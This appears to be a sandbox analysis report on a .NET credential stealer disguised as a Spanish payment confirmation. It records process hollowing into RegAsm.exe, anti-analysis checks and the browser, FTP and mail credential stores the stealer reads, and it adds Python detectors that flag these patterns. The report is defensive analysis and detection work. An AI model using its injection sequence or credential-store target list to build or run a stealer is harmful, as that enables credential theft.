Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: CVNXGJKDF133.pdb | source: Confirmaci#U00f3n de pago_shrunk.exe

Data Obfuscation

Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.cs | .Net Code: Type.GetTypeFromHandle(Odbuv6HxWjHwueiGji.aNMNDRPXQcyPS(16777254)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Odbuv6HxWjHwueiGji.aNMNDRPXQcyPS(16777255)),Type.GetTypeFromHandle(Odbuv6HxWjHwueiGji.aNMNDRPXQcyPS(16777252))})
Note: the type and parameter-type handles come out of an obfuscated helper (Odbuv6HxWjHwueiGji.aNMNDRPXQcyPS), but the method being looked up is the two-argument Marshal.GetDelegateForFunctionPointer(IntPtr, Type). Resolving it by reflection lets the loader turn raw native function pointers into callable delegates without any P/Invoke declarations for the underlying APIs appearing in the assembly's metadata.
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: TimeDateStamp 0xAEC31ED1 [Wed Nov 29 10:49:53 2062 UTC]
Note: the compile timestamp lies decades in the future. Read it as "not a real build time" rather than as proof of deliberate forgery: C# compilers in deterministic mode (the default in current .NET SDK projects) store a hash of the compilation in this field, and such values commonly have the high bit set, as this one does.
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Code function: 0_2_02D64A80 push esi; iretd 0_2_02D64A81
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Code function: 0_2_02D65676 pushad ; ret 0_2_02D65677
Source: Confirmaci#U00f3n de pago_shrunk.exe, i74psymjnMJvjAT5sZ.cs | High entropy of concatenated method names: 'dqNoP9MvuT', 'Y7Aob37hU8', 'QaMoNWP4xB', 'IXQoGJ5Plu', 'oC9oI6RlVg', 'HgqozmYsFC', 'FGy3nT2at9', 'Fon3o2SSkI', 'lOH33d0ud5', 'ccx3Cl0Ra8'
Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.cs | High entropy of concatenated method names: 'p4eoeiS1Ce', 'IJQNDRfPxmpxs', 'PseDWPkon', 'eInqklcMl', 'SJDFGaA5E', 'Fqp6yLoLW', 'GBN017qoM', 'Y4QpbCxPg', 'xojOBRJT6', 'M0OSgjXpB'
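The two static checks behind this section (a future compile timestamp and high-entropy method names) are easy to reproduce without the sandbox. The following is an added illustration, not code from the report or from the sample: it reads IMAGE_FILE_HEADER.TimeDateStamp out of raw PE bytes, decodes it the way the report prints it, and computes the Shannon entropy of concatenated method names. The method names are the ones listed above; the "benign" comparison list, the analysis date passed as `now`, and the minimal PE header built by `build_minimal_pe` are constructed for the example.

```python
"""Static triage helpers for two 'Data Obfuscation' findings:
a PE compile timestamp in the future and high-entropy (obfuscated) method names.
Added illustration; not part of the sandbox report or the analysed sample."""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

# Method names copied from the report's first 'high entropy' finding.
OBFUSCATED_NAMES = ['dqNoP9MvuT', 'Y7Aob37hU8', 'QaMoNWP4xB', 'IXQoGJ5Plu', 'oC9oI6RlVg',
                    'HgqozmYsFC', 'FGy3nT2at9', 'Fon3o2SSkI', 'lOH33d0ud5', 'ccx3Cl0Ra8']
# Constructed comparison set of ordinary .NET method names.
BENIGN_NAMES = ['GetValue', 'SetValue', 'ToString', 'Equals', 'GetHashCode',
                'Dispose', 'Initialize', 'Load', 'Save', 'Parse']


def shannon_entropy(text: str) -> float:
    """Bits per character of the empirical character distribution of `text`."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def method_name_entropy(names) -> float:
    """Entropy of the concatenated method names, the measure the report uses.
    Random-looking identifiers score well above 5 bits/char; English-derived
    names stay around 4."""
    return shannon_entropy(''.join(names))


def read_pe_timestamp(data: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp from raw PE bytes.
    e_lfanew at 0x3C points at the 4-byte PE signature; the COFF header follows
    and TimeDateStamp sits 8 bytes into it (after Machine and NumberOfSections)."""
    if data[:2] != b'MZ':
        raise ValueError('not an MZ executable')
    e_lfanew, = struct.unpack_from('<I', data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    ts, = struct.unpack_from('<I', data, e_lfanew + 4 + 4)
    return ts


def decode_timestamp(ts: int) -> datetime:
    """Seconds since the Unix epoch, in UTC, as the sandbox prints it."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def timestamp_verdict(ts: int, now: datetime) -> str:
    """'future' if the stamp post-dates the analysis, 'zero' if unset, else 'plausible'.
    Caveat: Roslyn deterministic builds store a hash of the compilation here
    (values usually have the high bit set), so 'future' means 'not a real build
    time', not necessarily 'deliberately forged'."""
    if ts == 0:
        return 'zero'
    if decode_timestamp(ts) > now:
        return 'future'
    return 'plausible'


def build_minimal_pe(ts: int) -> bytes:
    """Constructed stand-in for a PE file: DOS header + signature + COFF header,
    just enough for read_pe_timestamp to parse. Field values are placeholders."""
    dos = bytearray(0x40)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 0x40)          # e_lfanew -> PE header at 0x40
    # Machine (i386), NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack('<HHIIIHH', 0x14C, 1, ts, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b'PE\0\0' + coff


if __name__ == '__main__':
    ts = read_pe_timestamp(build_minimal_pe(0xAEC31ED1))
    print(hex(ts), decode_timestamp(ts), timestamp_verdict(ts, decode_timestamp(1727000000)))
    print('obfuscated', round(method_name_entropy(OBFUSCATED_NAMES), 2),
          'benign', round(method_name_entropy(BENIGN_NAMES), 2))
```

`read_pe_timestamp` works unchanged on a real file (`read_pe_timestamp(open(path, 'rb').read())`); the entropy threshold is a triage heuristic, so compare against names from the same code base rather than treating any single number as a verdict.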

Hooking and other Techniques for Hiding and Protection

Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (92).png (the file name is the sandbox's reference image, not the name of the imitated application)
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (61 identical entries)
Note: SetErrorMode(SEM_NOOPENFILEERRORBOX) only suppresses the "file not found" dialog when a library or file cannot be opened. The CLR's own library-loading paths typically set it, so these entries appear for practically every .NET process and carry little weight on their own.

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory allocated: 2D60000, 2F80000, 2D80000 (memory reserve | memory write watch)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 2EC0000, 30F0000, 2EC0000 (memory reserve | memory write watch)
Note: MEM_WRITE_WATCH reservations are how the .NET garbage collector tracks dirtied heap pages, so in a managed process they are expected and this indicator is low-weight. The 0_2_02D64A80 and 0_2_02D65676 code-function entries under Data Obfuscation fall inside the first of the sample's regions, not inside its mapped image.
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Thread delayed: delay time: 922337203685477
Note: 922337203685477 is Int64.MaxValue in 100-ns ticks divided into milliseconds (TimeSpan.MaxValue), i.e. a thread parked with an effectively infinite wait, not a timed sleep of a few minutes.
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 3832 | Thread sleep count: 318 > 30
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 3832 | Thread sleep count: 154 > 30
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 6064 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 2884 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Thread delayed: delay time: 922337203685477
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460095411.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695878398.000000000123F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Note: "Hyper-V RAW" is the name of the Hyper-V sockets Winsock provider registered by mswsock.dll, which both processes load; the string is present in the memory of any process that has loaded mswsock.dll and is a weak virtual-machine indicator on its own.
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FE6008
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Note: read together, these entries are a PE image being planted in a freshly started RegAsm.exe. An RWX region is allocated in the child at 0x400000 (the conventional image base of a 32-bit executable), a buffer beginning with the MZ signature (4D 5A) is written there, further writes land at 0x402000, 0x43C000 and 0x43E000 (offsets consistent with section starts of that image), and the child is started by the sample with no arguments beyond its own path. The isolated write at 0xFE6008 lies outside that range; an address of the form page+0x08 matches the ImageBaseAddress field of a 32-bit PEB, which an injector updates to point at the planted image, although the report itself does not identify that location. The unpacked dump 2.2.RegAsm.exe.400000.0.unpack listed under Stealing of Sensitive Information is what the sandbox recovered from this region.
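The sequence above is a detectable pattern independent of the sample: a process allocates executable memory in another process, writes a buffer that starts with the MZ signature at that base, writes more data above it, and the target was created by the same process (in suspended mode, per the report's signature summary). The code below is an added illustration, not sandbox code: it correlates a stream of such events per (injector, target) pair and reports the planted image base, the writes that fall within an assumed maximum image size, and any write outside it (such as the one at 0xFE6008). The event stream is constructed from the report's lines; the `suspended` flag, the 4-byte `data_prefix` and the `max_image_size` bound are assumptions for the example, and the local allocation at the end is included to show that same-process activity is ignored.

```python
"""Detector for the write-a-PE-into-another-process pattern recorded above:
a foreign allocation with execute protection, an MZ-headed write at its base,
further writes above it, and a child started by the same process.
Added illustration over constructed events; not sandbox or sample code."""
from dataclasses import dataclass, field

EXECUTE_PROTECTIONS = {
    'page execute and read and write',
    'page execute read',
    'page execute and write copy',
}


@dataclass
class Event:
    source: str               # process performing the action
    op: str                   # 'process_created' | 'memory_allocated' | 'memory_written'
    target: str               # process acted upon (same as source for a local action)
    base: int = 0             # address in the target (allocations and writes)
    protect: str = ''         # page protection (allocations)
    data_prefix: bytes = b''  # first bytes written (writes)
    suspended: bool = False   # created with CREATE_SUSPENDED (process_created)


@dataclass
class Finding:
    injector: str
    target: str
    image_base: int
    suspended_start: bool = False
    image_writes: list = field(default_factory=list)   # writes inside the planted image
    other_writes: list = field(default_factory=list)   # writes elsewhere (e.g. PEB fix-ups)


def find_pe_injections(events, max_image_size=0x400000):
    """Correlate events per (injector, target). A pair is reported when an executable
    allocation at some base is followed by a write starting with b'MZ' at that base.
    Remaining cross-process writes are split by whether they fall within
    max_image_size bytes above the base (assumed bound for the planted image)."""
    exec_allocs = set()   # (injector, target, base) with executable protection
    findings = {}         # (injector, target) -> Finding
    for e in events:
        if e.source == e.target:
            continue      # a process touching its own memory is not injection
        key = (e.source, e.target)
        if e.op == 'memory_allocated' and e.protect in EXECUTE_PROTECTIONS:
            exec_allocs.add(key + (e.base,))
        elif (e.op == 'memory_written' and e.data_prefix[:2] == b'MZ'
              and key + (e.base,) in exec_allocs):
            findings[key] = Finding(e.source, e.target, e.base)
    # second pass: attach the remaining writes and the suspended-start flag
    for e in events:
        f = findings.get((e.source, e.target))
        if f is None:
            continue
        if e.op == 'process_created' and e.suspended:
            f.suspended_start = True
        elif e.op == 'memory_written' and e.base != f.image_base:
            if f.image_base < e.base < f.image_base + max_image_size:
                f.image_writes.append(e.base)
            else:
                f.other_writes.append(e.base)
    return list(findings.values())


SAMPLE = r'C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe'
REGASM = r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'

# Constructed event stream reproducing the report's entries. The report lists the
# process creation last because it groups by signature; here it comes first,
# which is the order in which a suspended child must exist before being written.
REPORT_EVENTS = [
    Event(SAMPLE, 'process_created', REGASM, suspended=True),
    Event(SAMPLE, 'memory_allocated', REGASM, 0x400000, 'page execute and read and write'),
    Event(SAMPLE, 'memory_written', REGASM, 0x400000, data_prefix=b'MZ\x90\x00'),
    Event(SAMPLE, 'memory_written', REGASM, 0x402000),
    Event(SAMPLE, 'memory_written', REGASM, 0x43C000),
    Event(SAMPLE, 'memory_written', REGASM, 0x43E000),
    Event(SAMPLE, 'memory_written', REGASM, 0xFE6008),
    # local allocation in the sample's own address space: must not be reported
    Event(SAMPLE, 'memory_allocated', SAMPLE, 0x2D60000, 'page read and write'),
]

if __name__ == '__main__':
    for f in find_pe_injections(REPORT_EVENTS):
        print(f'{f.injector} -> {f.target}: image at {f.image_base:#x}, '
              f'suspended={f.suspended_start}, image writes={[hex(b) for b in f.image_writes]}, '
              f'other writes={[hex(b) for b in f.other_writes]}')
```

The detector deliberately requires the MZ write to land in a region the injector itself allocated executable; hollowing variants that overwrite the child's original mapped image without a fresh allocation would need the allocation condition relaxed to "any cross-process write starting with MZ at the target's image base".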
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Queries volume information: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Note: MachineGuid is a stable per-installation identifier; stealers commonly read it to tag a victim, so it is worth correlating with any identifier seen in the sample's outbound traffic.

Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR
Second match set (the rule name is not shown at this point of the report):
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR
Note: the payload matched both in the image planted in RegAsm.exe (2.2.RegAsm.exe.400000.0.unpack) and in three in-memory copies inside the parent sample's own process (the 0.2.…409af30, 4060508 and 40d5950 dumps), so the decrypted payload can be carved from the parent before the injection happens. The match on sslproxydump.pcap is on the sandbox's TLS-proxy capture, meaning the rule also fired on decrypted network content.
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
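The file and registry targets above are the usual AgentTesla credential-store sweep, and the detection-worthy fact is not the paths themselves but that RegAsm.exe (a .NET framework utility) is the process opening them. The following script is an added example, not part of the Joe Sandbox report: it runs a small rule set over constructed process-monitor style lines ("image|operation|target") and alerts when a process outside a per-store allowlist touches a credential store. The target patterns are taken from the RegAsm.exe behaviour listed above; the allowlists and the image names ftpnav.exe and incmail.exe are assumptions for illustration, not values from the report.

```python
"""Flag processes that open credential stores they have no business reading.

Added example (not part of the Joe Sandbox report). The targets mirror the
RegAsm.exe behaviour in the report; the log format, the allowlists and the
image names ftpnav.exe / incmail.exe are constructed for this example.
"""
import re
from dataclasses import dataclass

# (category, regex over the lower-cased target, processes allowed to open it)
RULES = [
    ("browser_logins",
     r"\\(google\\chrome|microsoft\\edge)\\user data\\.*\\login data$",
     {"chrome.exe", "msedge.exe"}),
    ("mozilla_profiles",
     r"\\(mozilla\\firefox|8pecxstudios\\cyberfox|netgate technologies\\blackhawk|thunderbird)\\profiles\.ini$",
     {"firefox.exe", "cyberfox.exe", "blackhawk.exe", "thunderbird.exe"}),
    ("winscp_sessions",
     r"^hkey_current_user\\software\\martin prikryl\\winscp 2\\sessions$",
     {"winscp.exe"}),
    ("ftp_client_store",
     r"\\ftp navigator\\ftplist\.txt$",
     {"ftpnav.exe"}),            # image name assumed for the example
    ("mail_profiles",
     r"^hkey_current_user\\software\\(microsoft\\windows nt\\currentversion\\windows messaging subsystem\\profiles|incredimail\\identities)$",
     {"outlook.exe", "incmail.exe"}),  # incmail.exe assumed for the example
]


@dataclass(frozen=True)
class Alert:
    process: str
    category: str
    target: str


def parse_line(line):
    """Split 'image|operation|target' (constructed format, not a Joe Sandbox log)."""
    image, op, target = line.rstrip("\n").split("|", 2)
    return image.strip().lower(), op.strip().lower(), target.strip()


def classify(target):
    """Return (category, allowed_processes) for a credential store, else (None, None)."""
    t = target.lower()
    for category, pattern, allowed in RULES:
        if re.search(pattern, t):
            return category, allowed
    return None, None


def detect(lines):
    """One Alert per distinct (process, category, target) from a non-allowlisted process."""
    alerts, seen = [], set()
    for line in lines:
        image, op, target = parse_line(line)
        if op not in ("file opened", "key opened"):
            continue
        category, allowed = classify(target)
        if category is None or image in allowed:
            continue
        key = (image, category, target)
        if key not in seen:
            seen.add(key)
            alerts.append(Alert(image, category, target))
    return alerts


def summarize(alerts):
    """Map each offending process to the store categories it touched, in first-seen order."""
    out = {}
    for a in alerts:
        cats = out.setdefault(a.process, [])
        if a.category not in cats:
            cats.append(a.category)
    return out


# Constructed sample log: the RegAsm.exe targets from the report, the duplicate
# Thunderbird open, plus two benign events that must not alert.
SAMPLE_LOG = [
    r"RegAsm.exe|Key opened|HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    r"RegAsm.exe|File opened|C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"RegAsm.exe|File opened|C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    r"RegAsm.exe|File opened|C:\FTP Navigator\Ftplist.txt",
    r"RegAsm.exe|File opened|C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"RegAsm.exe|File opened|C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"RegAsm.exe|Key opened|HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    r"chrome.exe|File opened|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"RegAsm.exe|File opened|C:\Users\user\AppData\Local\Temp\x.tmp",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a.process} -> {a.category}: {a.target}")
    print(summarize(detect(SAMPLE_LOG)))
```

The allowlist is keyed per store rather than global on purpose: chrome.exe reading its own Login Data is normal, chrome.exe reading WinSCP sessions is not. In production the same logic sits on Sysmon Event ID 11/12/13 or an EDR file-open telemetry feed instead of the constructed lines.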
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
